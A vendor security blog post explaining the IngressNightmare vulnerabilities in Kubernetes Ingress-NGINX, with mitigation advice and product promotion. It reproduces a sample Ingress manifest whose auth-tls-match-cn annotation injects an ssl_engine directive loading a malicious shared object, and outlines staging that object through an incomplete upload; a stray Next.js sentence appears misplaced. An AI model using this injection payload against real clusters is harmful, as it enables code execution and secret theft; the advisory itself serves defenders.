Threats
8
min read

IngressNightmare: Critical Ingress NGINX Flaws in Kubernetes — And How to Respond

Matthias Luft
March 27, 2025

Understanding IngressNightmare: A Wake-Up Call for Kubernetes Security

In March 2025, a critical set of vulnerabilities collectively referred to as IngressNightmare was disclosed in the Kubernetes Ingress-NGINX Controller. 

While the headlines focus on the potential for remote code execution (RCE), the real story is deeper: it exposes the dangerous assumptions many teams make about ingress architecture, internal trust boundaries, and the security of cluster defaults.

The following five CVEs were disclosed in March 2025 as part of the IngressNightmare advisory:

  • CVE-2025-24513 (Path Traversal) – Auth secret file path traversal via auth-tls-secret, enabling configuration reference to unintended secrets
  • CVE-2025-24514 (Config injection: auth-url) – Configuration injection via unsanitized auth-url annotation, bypassing input validation
  • CVE-2025-1097 (Config injection: auth-tls-match-cn) – Configuration injection via unsanitized auth-tls-match-cn annotation, allowing directive injection
  • CVE-2025-1098 (Config Injection: Mirror Annotations) – Configuration injection via unsanitized mirror-request-body and related annotations
  • CVE-2025-1974 (Admission Webhook RCE) – Unauthenticated RCE via abuse of the Ingress-NGINX admission webhook’s dry-run configuration validation

Together, these vulnerabilities span configuration injection, path traversal, and privileged webhook exposure. When chained, they allow unauthenticated attackers with internal access to achieve remote code execution in clusters using vulnerable versions of Ingress-NGINX — without requiring internet-facing services or elevated privileges.

This blog synthesizes insights from our own internal research, alongside technical analysis from Datadog and Wiz — but with a different lens: not just how the exploit works, but what it reveals about Kubernetes trust assumptions and internal exposure risk.

In this blog, we’ll explore:

  • What makes the IngressNightmare chain possible
  • Why internal exposure is more dangerous than it appears
  • How teams can assess their real risk
  • What steps to take to harden ingress and reduce lateral movement

Ingress Controller Exposure: Understand the Real Risk

The vulnerabilities are often described as leading to “Remote Code Execution,” but that risk is overstated in many environments. Successful exploitation from the internet is only possible in non-standard configurations — such as those where the admission webhook has been explicitly exposed via a LoadBalancer or NodePort service.

There’s no simple way to enumerate such exposed clusters across the internet, but based on common deployment patterns, the number is likely very low.

That doesn’t mean there’s no risk.

In most Kubernetes clusters, the vulnerable webhook is assigned a ClusterIP — making it accessible only from within the cluster. But without strict network policies, any internal pod — including those compromised or attacker-deployed — can reach it.

You can confirm this with:

Here’s a simplified example. Imagine a route at /authenticated that is protected by the following Next.js middleware:

kubectl get service -n ingress-nginx ingress-nginx-controller-admission

Example output:

NAME							TYPE		CLUSTER-IP		EXTERNAL-IP		PORT(S)		AGE
ingress-nginx-controller-admission	ClusterIP		10.102.255.123	<none>			443/TCP		281d

In this configuration, there’s no external IP assigned — the service is not internet-accessible. But the internal exposure still matters.

Without enforced NetworkPolicies, this internal service is wide open to anything running inside the cluster. In modern cloud-native environments where internal workloads span multiple trust boundaries, that’s not a safe default.

For more on this topic, read our blog: Navigating Cloud Network Complexity

How IngressNightmare Works: The Exploitation Chain

IngressNightmare is a chain of issues that, when combined, allow unauthenticated attackers with internal network access to achieve remote code execution in Kubernetes environments using the Ingress-NGINX controller.

IngressNightmare Exploit Chain

The chain works in three parts:

1. Triggering the Configuration Test

The core issue is that any pod with network access to the ingress controller’s admission webhook can trigger an NGINX configuration test. This dry-run validation doesn’t apply the configuration, but it does parse and process certain directives — including ssl_engine, which causes NGINX to load a shared object from the file system.

2. Injecting Arbitrary Configuration

To exploit this behavior, the attacker must inject a malicious directive like ssl_engine /path/to/library.so; into the configuration. There are two known paths for doing this:

  • Annotation-based injection, via:
    • nginx.ingress.kubernetes.io/auth-tls-match-cn
    • nginx.ingress.kubernetes.io/auth-url
  • UID-based injection, by controlling the UID of a Kubernetes resource created in the cluster

Here’s a representative example of annotation-based injection, drawn from the original disclosure:

Example output:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: sample-ingress
  namespace: ingress-nginx
  annotations:
    nginx.ingress.kubernetes.io/auth-tls-match-cn: "CN=abc #(\n){}\n }}\nssl_engine /etc/nginx/malicious_library.so;\n#"
    nginx.ingress.kubernetes.io/auth-tls-secret: "ingress-nginx/testcert"
spec:
  rules:
    - host: hostname.demo.org
      http:
        paths:
          - path: /
            pathType: Prefix
            backend:
              service:
                name: clusterservice
                port:
                  number: 80
  ingressClassName: nginx

In the case of auth-tls-match-cn, a valid TLS secret must also be provided. For auth-url, the injected payload must pass Go’s url.Parse() validation and still result in a syntactically valid NGINX config.

With UID-based injection, the attacker supplies a specially crafted UID when creating a resource. Because this UID is included in the config file name, it becomes another injection vector.

3. Staging and Executing the Payload

The ssl_engine directive tells NGINX to load a shared object, typically used for hardware-based SSL acceleration. The attacker doesn’t need a functioning SSL engine — the malicious .so can contain a constructor function (__attribute__((constructor))) that executes arbitrary code the moment it’s loaded.

To make the file available, the attacker uses a technique: they initiate an HTTP file upload to the controller, but don’t complete it. This leaves the partially uploaded file in a temporary location, accessible via /proc/PID/fd. The attacker then references that file descriptor in the injected config. Enumeration is trivial due to the small pid and fd space of the pod.

The result is a clean, quiet exploit chain that doesn’t rely on remote exposure of the vulnerable webhook — just default internal trust. It exploits architectural assumptions, not vulnerabilities in isolation.

From Foothold to Impact: The Scope of IngressNightmare

So what happens if an attacker succeeds?

Exploitation provides code execution in the ingress controller pod, which typically has access to all Kubernetes secrets. That’s significant.

NOTE: While this is not necessarily a complete cluster compromise, it will most likely open up new lateral movement paths.

In many real-world environments, this privileged access includes:

  • TLS certificates
  • Service account tokens
  • Cloud metadata endpoints
  • Third party / cloud provider credentials

Which can be used for:

  • Impersonating internal services
  • Escalating to cloud API access
  • Pivoting to sensitive application workloads

Related reading: Intransparent Azure Ingress Flows

How to Secure Your Cluster Against IngressNightmare

Securing Your Cluster Against IngressNightmare

Patch Immediately

  • Upgrade to Ingress-NGINX v1.12.1 or later.

Audit Admission Webhook Exposure

  • Ensure it is not accessible from outside the cluster.
  • Within the cluster, restrict access using Kubernetes NetworkPolicies.

Harden Annotations Usage

  • Review ingress resources for use of potentially dangerous annotations.

Monitor for Suspicious Activity

  • Watch for incomplete HTTP uploads or temporary file abuse.
  • Flag attempts to load unusual shared libraries via NGINX.

How Averlon Can Help with IngressNightmare

IngressNightmare is a reminder that internal components like ingress controllers — even when not internet-facing — can become high-value entry points. It’s not just about whether a vulnerability exists, but what it enables: lateral movement, secret exposure, and privilege escalation within trusted infrastructure.

That’s why response can’t just mean patching fast. Security teams need to understand:

  • What risks a vulnerability introduces in their environment
  • How it reshapes attacker movement potential
  • Which paths are most urgent to investigate and remediate

This is exactly where Averlon steps in.

Powered by agentic AI, Averlon continuously analyzes Kubernetes environments to uncover hidden risks — not just individual CVEs, but how those vulnerabilities connect to broader exploit chains.

We help security teams:

  • Identify how a vulnerability connects to broader exploit paths
  • Understand which internal exposures open high-value access
  • Prioritize based on real attacker movement potential
  • Automate investigation, mitigation, and remediation — not just alert triage

Averlon is built to help you scale Kubernetes security with context-aware, priority-driven, and action-oriented intelligence — turning insights into outcomes, not just dashboards.

Contact us to learn how Averlon helps you stay ahead of internal exposure and secure Kubernetes at scale.

Takeaway: Internal Exposure Is Still Exposure

IngressNightmare is less about novel exploitation techniques and more about fully understanding your Kubernetes threat model. In smaller clusters, infrastructure and system pods can make up a relevant percentage of total pod count, yet they are rarely included in detailed threat models. The following aspects need to be taken into account:

  • Kubernetes by default does not restrict network traffic within the cluster — while it should be establishing trust boundaries between system pods and application workloads.
  • Ingress controllers and other system pods are complex, privileged components — and must be treated as part of the attack surface.
  • Most system pods expose internal network services — we will publish an overview shortly. 

It’s time for teams to revisit their assumptions about Kubernetes trust boundaries, review cluster-internal network separation, and recognize that high-privilege components—even if "not exposed"—can become the weakest link.

Want to explore how Averlon can help your team stay ahead of the next exploit chain? Let’s talk.

Want to dig deeper?

Explore more of our research and insights on:

Ready to Reduce Cloud Security Noise and Act Faster?

Discover the power of Averlon’s AI-driven insights. Identify and prioritize real threats faster and drive a swift, targeted response to regain control of your cloud. Shrink the time to resolution for critical risk by up to 90%.

CTA image